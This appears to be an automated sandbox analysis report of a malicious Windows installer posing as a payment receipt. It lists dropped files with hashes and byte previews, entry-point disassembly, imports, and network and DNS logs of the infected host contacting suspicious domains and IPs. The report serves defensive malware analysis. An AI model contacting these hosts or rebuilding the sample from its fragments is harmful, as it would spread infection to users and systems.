                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      No simulations
                                                      No context
                                                      Process:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5602
                                                      Entropy (8bit):6.24505051626392
                                                      Encrypted:false
                                                      SSDEEP:96:j7hz+pcihT7oMz55kZ1OquI8WDlzTuais2fmOPJ:rcTkMdqiquIRDlzy22fmOJ
                                                      MD5:6D8E18D69240FFEA42588DAB287B1101
                                                      SHA1:CEFD52A04F08EF59709DB3DDBF7F9409D0C795BE
                                                      SHA-256:2CE4DD4327EB70E03E7D48D57BC1C46EC922B73FB7E9501C1F7A2580F19F7121
                                                      SHA-512:0BE89301E5319E37B9C6641BBF3689FB91BB79B7CCA37034C4533FD87A4110F67D44D3130D0FDED9448251F9C6344EB1DED6A540A2F9152BD85D3E59B5F10ABA
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:Y8....................jW%.......,+.......K......zh....R.@...K...R....:..-X..%..,....<7..+.....zQq...Z....c.4.X...Y..-X..%..!.................j....."z.....R.a..^! ...K.oR7.^.W.R.W%.....,.B.R.m.%....l+..b....?.......C..E..-X..%..!!',+....L........[."2.*~....&.s..j...%^..J....R......["z`.......h.%^.....{.R../.X....Jc......[..%..!!',+.................j....."z.........+.-J......B...B. ..^.+...R./...?[...c...c.3.X ..G..S.R2c.J.X......S .c.J..2.c....D.Wc.....3....-^.[.....+.-^.%J.......R...R.../.X..%..,....<7..+.b...zQq.....Z....c.4.X...{..-X..%........[.........n\.f.\.u=\.|.\.{.\.z......J. .*.... .*...$ .*... .*... .*... .*... .*... .*... i*... d*... .*...R .*...X .*...F.R...\z.M...........zet.....7.|...z.t...........zEM..........zuM......J{...z.M......,`....zUM.....$mR...z.M.........z.M.....R..R.\..Bc.R.Qr.\..B3.R.r\..B=.R..R.\..B..R.Qr.\..B....n..r.....r...r..r..&..r.. ..KA..nc..b..rc...B.Z..r...B...R..R.c...f......c...B.Q...R.Qr.c...f...Qq.c...B.Q.
                                                      Process:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):189440
                                                      Entropy (8bit):7.998637942598542
                                                      Encrypted:true
                                                      SSDEEP:3072:quO0aqJigCEAvaCz86Qx8s0XgLjOZ7OZyyZJ8/+UGlWBu3/2kq13Ok0em/D:qut+EAvpzIn0XgLjO5OZyAJ8/+UG4BQP
                                                      MD5:F4A6BF70E5353725EDBD930F6311A876
                                                      SHA1:D329889E536CEBF7E71E2BD7CB9B4F078E115E03
                                                      SHA-256:A640DF81745A2E0EA64055877F85F6B6B5E00512018DA51AF51B85AB5FB8CE0F
                                                      SHA-512:BC962A3C95BDC9E9C30F73C7D53463F07C16B62CF7044CEB5D06A6FA5CE96A44BFB38B02113DE92EB42D969499EF50248288E351130966F3FFD5389E31940DEE
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:l.......1..._B...w..PH.......#.SL.....d%w..*Y....a.t:...Q(.....K.M...?s....F....Cb..?.1.a...W:.S.........%...}..6:...L#z.q.F.........JV........x.....>.r=....z..(3...D.h.2.o^...N...{...?J...a...-1..../..(.......RM..hc.]2 .3.*.}..L.......c...y...s......N.N]d..Bw....^.t..g#..L...../.d.w..*Y.C..a.t:...Q(.F...a...dLa.n.K[b....>....Z.`..."...h...|.q.....ND,.Z...L#z+V=Pzu.{....{P..r.....?.......C........-.W.2.o^......$.....w.b.-..d.C..../..(........Oe.p.hc.]2 ....*.U..L..............s......N.N]d...w.m..^.t....#.SL.....d%w..*Y....a.t:...Q(.F...a...dLa.n.K[b....>....Z.`..."...h...|.q.....ND,.Z...L#z+V=Pzu.{....{P..r.....?.......C........-.W.2.o^...N...{....#.b.-..4.C..../..(.........e...hc.]2 ....*.U..L..............s......N.N]d...w.m..^.t....#.SL.....d%w..*Y....a.t:...Q(.F...a...dLa.n.K[b....>....Z.`..."...h...|.q.....ND,.Z...L#z+V=Pzu.{....{P..r.....?.......C........-.W.2.o^...N...{....#.b.-..4.C..../..(.........e...hc.]2 .
                                                      Process:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                      Category:modified
                                                      Size (bytes):125440
                                                      Entropy (8bit):6.273030876874131
                                                      Encrypted:false
                                                      SSDEEP:3072:Ug2QMgHRT3WstYkFm/W3M0omix1RSlwTyv8/RMAlV:UEHRT3jtQ2cmGRSqT9l
                                                      MD5:353F7D8845E3DD77D50661A00EC7DF55
                                                      SHA1:F9AA7D4B6EC63AD64BA14E8FC9C4068204590EBC
                                                      SHA-256:38FAD353228A143830ED3057A14DFD9A0853494BE8CD7ED62CF2676F963A0963
                                                      SHA-512:AD8CACE8BC0A3889FFD76CCCC0EF823DC316FA4DB37F6A7A94278C3FACA26A547B5278B3DE615A23123DC6B0E2D61FDBFEA0BE5D48ED297001B080A813BB5233
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 54%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;..P.........k...v..k......k...m.....o.....b.....n..k...l...........~...T.~.....~..Rich...........PE..L....v.c.................f........................@..........................@..............................................t........0..................................................................@...............0............................text...'e.......f.................. ..`.rdata...j.......l...j..............@..@.data...(+..........................@....gfids....... ......................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                      Category:modified
                                                      Size (bytes):94208
                                                      Entropy (8bit):1.2889923589460437
                                                      Encrypted:false
                                                      SSDEEP:192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
                                                      MD5:7901DD9DF50A993306401B7360977746
                                                      SHA1:E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
                                                      SHA-256:1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
                                                      SHA-512:90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      File Type:COM executable for DOS
                                                      Category:dropped
                                                      Size (bytes):328874
                                                      Entropy (8bit):7.530300700886958
                                                      Encrypted:false
                                                      SSDEEP:6144:jFut+EAvpzIn0XgLjO5OZyAJ8/+UG4BQvsr0em//5EHRT3jtQ2cmGRSqT9l:put+lI/Li5iJtd4WvW0eIR+RbG2cmQ
                                                      MD5:18D5F36A346E0AEEDCB501EF671823D3
                                                      SHA1:56E354ECEF94D44EF1B827B731B7AFCDAF9F2E11
                                                      SHA-256:9F98ECEC18045E1B2A7C0CB27C0AF56467ED49166BD9E3E7CCD3E3C6E1FE4C61
                                                      SHA-512:1059B83FBF865596D437C1F662A597D17F0DA2081D7E6F2ED501B33C77EA8F8C4E94B95BF914CAE99B99D3A8DD466920EB3C82CE58FDA6BB35B552F5DCC533E4
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:. ......,...................e.................... ..........................................................................................................................................................................................................................................J...................j...............................................................................................................................h..........."...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):6.542091394809889
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:payment_copy2_receipt.exe
                                                      File size:548510
                                                      MD5:9b8c61ded729ca6c9d5f7fded18eef27
                                                      SHA1:37fc137e9aa09fc01820cd90c851ca3aee6be72a
                                                      SHA256:c1609447bd7a2ee528d1f2145ebc3ad9a53efee61111824d22f935e497bac31f
                                                      SHA512:d2696cf0e8b169763a1ba52211edbbc729f4f3a2aee8b6c029138d0fa180000b1f1781e777edb7328520c057c522371a698279e5ad178fda5b961d127bca27f5
                                                      SSDEEP:6144:lBnlWGbqCEADGaF1B1XBx23XB0RQ4MXC+l1O45IDkQBha03YIjo4:wCEQGKy3R0qPHO45FQBhaM
                                                      TLSH:9AC4FCF1C795E5A8F886AE3D41335CBB94BB997D6DA05DDE410CB4B2AF3278210A05C3
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........
                                                      Icon Hash:214e9696969616a0
                                                      Entrypoint:0x40324f
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:ab6770b0a8635b9d92a5838920cfe770
                                                      Instruction
                                                      sub esp, 00000180h
                                                      push ebx
                                                      push ebp
                                                      push esi
                                                      push edi
                                                      xor ebx, ebx
                                                      push 00008001h
                                                      mov dword ptr [esp+1Ch], ebx
                                                      mov dword ptr [esp+14h], 00409130h
                                                      xor esi, esi
                                                      mov byte ptr [esp+18h], 00000020h
                                                      call dword ptr [004070B8h]
                                                      call dword ptr [004070B4h]
                                                      cmp ax, 00000006h
                                                      je 00007FCDF4BDD063h
                                                      push ebx
                                                      call 00007FCDF4BDFE51h
                                                      cmp eax, ebx
                                                      je 00007FCDF4BDD059h
                                                      push 00000C00h
                                                      call eax
                                                      push 004091E0h
                                                      call 00007FCDF4BDFDD2h
                                                      push 004091D8h
                                                      call 00007FCDF4BDFDC8h
                                                      push 004091CCh
                                                      call 00007FCDF4BDFDBEh
                                                      push 0000000Dh
                                                      call 00007FCDF4BDFE21h
                                                      push 0000000Bh
                                                      call 00007FCDF4BDFE1Ah
                                                      mov dword ptr [00423F84h], eax
                                                      call dword ptr [00407034h]
                                                      push ebx
                                                      call dword ptr [00407270h]
                                                      mov dword ptr [00424038h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+34h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 0041F538h
                                                      call dword ptr [00407160h]
                                                      push 004091C0h
                                                      push 00423780h
                                                      call 00007FCDF4BDFA51h
                                                      call dword ptr [004070B0h]
                                                      mov ebp, 0042A000h
                                                      push eax
                                                      push ebp
                                                      call 00007FCDF4BDFA3Fh
                                                      push ebx
                                                      call dword ptr [00407144h]
                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73cc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x42720 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5c4a | 0x5e00 | False | 0.659906914893617 | data | 6.410763775060762 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x115e | 0x1200 | False | 0.4466145833333333 | data | 5.142548180775325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1b078 | 0x600 | False | 0.455078125 | data | 4.2252195571372315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2d000 | 0x42720 | 0x42800 | False | 0.17087640977443608 | data | 3.7167114574794757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2d190 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144 | English | United States
RT_DIALOG | 0x6f1b8 | 0x100 | data | English | United States
RT_DIALOG | 0x6f2b8 | 0x11c | data | English | United States
RT_DIALOG | 0x6f3d8 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x6f438 | 0x14 | data | English | United States
RT_MANIFEST | 0x6f450 | 0x2cc | XML 1.0 document, ASCII text, with very long lines (716), with no line terminators | English | United States
DLL | Import
KERNEL32.dll | SetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
USER32.dll | GetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 16:43:29.603773117 CET | 49712 | 80 | 192.168.2.7 | 103.100.208.243
Nov 29, 2022 16:43:29.993545055 CET | 80 | 49712 | 103.100.208.243 | 192.168.2.7
Nov 29, 2022 16:43:29.993638039 CET | 49712 | 80 | 192.168.2.7 | 103.100.208.243
Nov 29, 2022 16:43:29.993803024 CET | 49712 | 80 | 192.168.2.7 | 103.100.208.243
Nov 29, 2022 16:43:30.383208036 CET | 80 | 49712 | 103.100.208.243 | 192.168.2.7
Nov 29, 2022 16:43:30.383261919 CET | 80 | 49712 | 103.100.208.243 | 192.168.2.7
Nov 29, 2022 16:43:30.383296967 CET | 80 | 49712 | 103.100.208.243 | 192.168.2.7
Nov 29, 2022 16:43:30.383447886 CET | 49712 | 80 | 192.168.2.7 | 103.100.208.243
Nov 29, 2022 16:43:30.383611917 CET | 49712 | 80 | 192.168.2.7 | 103.100.208.243
Nov 29, 2022 16:43:30.772913933 CET | 80 | 49712 | 103.100.208.243 | 192.168.2.7
Nov 29, 2022 16:43:40.625875950 CET | 49713 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:40.645251036 CET | 80 | 49713 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:40.645396948 CET | 49713 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:40.645670891 CET | 49713 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:40.664767981 CET | 80 | 49713 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:40.692596912 CET | 80 | 49713 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:40.692632914 CET | 80 | 49713 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:40.692769051 CET | 49713 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:40.693511009 CET | 49713 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:40.706896067 CET | 80 | 49713 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:40.706959963 CET | 49713 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:41.658564091 CET | 49713 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:42.678809881 CET | 49715 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:42.697918892 CET | 80 | 49715 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:42.698271990 CET | 49715 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:42.698271990 CET | 49715 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:42.717390060 CET | 80 | 49715 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:42.837244987 CET | 80 | 49715 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:42.837280989 CET | 80 | 49715 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:42.837524891 CET | 49715 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:42.838152885 CET | 49715 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:42.852073908 CET | 80 | 49715 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:42.852161884 CET | 49715 | 80 | 192.168.2.7 | 75.2.115.196
Nov 29, 2022 16:43:42.857156992 CET | 80 | 49715 | 75.2.115.196 | 192.168.2.7
Nov 29, 2022 16:43:49.040884018 CET | 49716 | 80 | 192.168.2.7 | 34.110.163.134
Nov 29, 2022 16:43:49.057763100 CET | 80 | 49716 | 34.110.163.134 | 192.168.2.7
Nov 29, 2022 16:43:49.057857990 CET | 49716 | 80 | 192.168.2.7 | 34.110.163.134
Nov 29, 2022 16:43:49.058307886 CET | 49716 | 80 | 192.168.2.7 | 34.110.163.134
Nov 29, 2022 16:43:49.075227022 CET | 80 | 49716 | 34.110.163.134 | 192.168.2.7
Nov 29, 2022 16:43:49.175266027 CET | 80 | 49716 | 34.110.163.134 | 192.168.2.7
Nov 29, 2022 16:43:49.175347090 CET | 80 | 49716 | 34.110.163.134 | 192.168.2.7
Nov 29, 2022 16:43:49.175451994 CET | 49716 | 80 | 192.168.2.7 | 34.110.163.134
Nov 29, 2022 16:43:50.065264940 CET | 49716 | 80 | 192.168.2.7 | 34.110.163.134
Nov 29, 2022 16:43:51.084142923 CET | 49717 | 80 | 192.168.2.7 | 34.110.163.134
Nov 29, 2022 16:43:51.103156090 CET | 80 | 49717 | 34.110.163.134 | 192.168.2.7
Nov 29, 2022 16:43:51.103333950 CET | 49717 | 80 | 192.168.2.7 | 34.110.163.134
Nov 29, 2022 16:43:51.103663921 CET | 49717 | 80 | 192.168.2.7 | 34.110.163.134
Nov 29, 2022 16:43:51.123337984 CET | 80 | 49717 | 34.110.163.134 | 192.168.2.7
Nov 29, 2022 16:43:51.221019030 CET | 80 | 49717 | 34.110.163.134 | 192.168.2.7
Nov 29, 2022 16:43:51.221077919 CET | 80 | 49717 | 34.110.163.134 | 192.168.2.7
Nov 29, 2022 16:43:51.221364975 CET | 49717 | 80 | 192.168.2.7 | 34.110.163.134
Nov 29, 2022 16:43:51.221716881 CET | 49717 | 80 | 192.168.2.7 | 34.110.163.134
Nov 29, 2022 16:43:51.238799095 CET | 80 | 49717 | 34.110.163.134 | 192.168.2.7
Nov 29, 2022 16:43:56.275064945 CET | 49718 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:56.400295973 CET | 80 | 49718 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:43:56.402024031 CET | 49718 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:56.406605005 CET | 49718 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:56.531891108 CET | 80 | 49718 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:43:56.536995888 CET | 80 | 49718 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:43:56.537045002 CET | 80 | 49718 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:43:56.537080050 CET | 80 | 49718 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:43:56.537187099 CET | 49718 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:56.537240982 CET | 49718 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:57.409480095 CET | 49718 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:58.425900936 CET | 49719 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:58.551639080 CET | 80 | 49719 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:43:58.551841974 CET | 49719 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:58.553603888 CET | 49719 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:58.678706884 CET | 80 | 49719 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:43:58.679014921 CET | 80 | 49719 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:43:58.679047108 CET | 80 | 49719 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:43:58.679070950 CET | 80 | 49719 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:43:58.679266930 CET | 49719 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:58.679702044 CET | 49719 | 80 | 192.168.2.7 | 70.32.23.81
Nov 29, 2022 16:43:58.804666042 CET | 80 | 49719 | 70.32.23.81 | 192.168.2.7
Nov 29, 2022 16:44:03.759083986 CET | 49720 | 80 | 192.168.2.7 | 2.57.90.16
Nov 29, 2022 16:44:03.791296959 CET | 80 | 49720 | 2.57.90.16 | 192.168.2.7
Nov 29, 2022 16:44:03.791491985 CET | 49720 | 80 | 192.168.2.7 | 2.57.90.16
Nov 29, 2022 16:44:03.791666985 CET | 49720 | 80 | 192.168.2.7 | 2.57.90.16
Nov 29, 2022 16:44:03.823739052 CET | 80 | 49720 | 2.57.90.16 | 192.168.2.7
Nov 29, 2022 16:44:03.823765039 CET | 80 | 49720 | 2.57.90.16 | 192.168.2.7
Nov 29, 2022 16:44:03.823781013 CET | 80 | 49720 | 2.57.90.16 | 192.168.2.7
Nov 29, 2022 16:44:03.823925972 CET | 49720 | 80 | 192.168.2.7 | 2.57.90.16
Nov 29, 2022 16:44:04.800724030 CET | 49720 | 80 | 192.168.2.7 | 2.57.90.16
Nov 29, 2022 16:44:05.817096949 CET | 49721 | 80 | 192.168.2.7 | 2.57.90.16
Nov 29, 2022 16:44:05.849591970 CET | 80 | 49721 | 2.57.90.16 | 192.168.2.7
Nov 29, 2022 16:44:05.849843979 CET | 49721 | 80 | 192.168.2.7 | 2.57.90.16
Nov 29, 2022 16:44:05.850018024 CET | 49721 | 80 | 192.168.2.7 | 2.57.90.16
Nov 29, 2022 16:44:05.882168055 CET | 80 | 49721 | 2.57.90.16 | 192.168.2.7
Nov 29, 2022 16:44:05.882213116 CET | 80 | 49721 | 2.57.90.16 | 192.168.2.7
Nov 29, 2022 16:44:05.882236958 CET | 80 | 49721 | 2.57.90.16 | 192.168.2.7
Nov 29, 2022 16:44:05.882447958 CET | 49721 | 80 | 192.168.2.7 | 2.57.90.16
Nov 29, 2022 16:44:05.882611036 CET | 49721 | 80 | 192.168.2.7 | 2.57.90.16
Nov 29, 2022 16:44:05.914745092 CET | 80 | 49721 | 2.57.90.16 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 16:43:29.273768902 CET | 63926 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:43:29.596674919 CET | 53 | 63926 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:43:40.413796902 CET | 53336 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:43:40.623732090 CET | 53 | 53336 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:43:48.826666117 CET | 50513 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:43:49.039021015 CET | 53 | 50513 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:43:56.242922068 CET | 60765 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:43:56.273133039 CET | 53 | 60765 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:44:03.725838900 CET | 58283 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:44:03.757194996 CET | 53 | 58283 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:44:10.895929098 CET | 49516 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:44:11.068994045 CET | 53 | 49516 | 8.8.8.8 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2022 16:43:29.273768902 CET | 192.168.2.7 | 8.8.8.8 | 0x36cc | Standard query (0) | www.030332.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:43:40.413796902 CET | 192.168.2.7 | 8.8.8.8 | 0xee3c | Standard query (0) | www.vnsuda.lol | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:43:48.826666117 CET | 192.168.2.7 | 8.8.8.8 | 0x818 | Standard query (0) | www.coolfashionshop.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:43:56.242922068 CET | 192.168.2.7 | 8.8.8.8 | 0xf885 | Standard query (0) | www.stephapproved.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:44:03.725838900 CET | 192.168.2.7 | 8.8.8.8 | 0xf051 | Standard query (0) | www.bem4u.shop | A (IP address) | IN (0x0001) | false
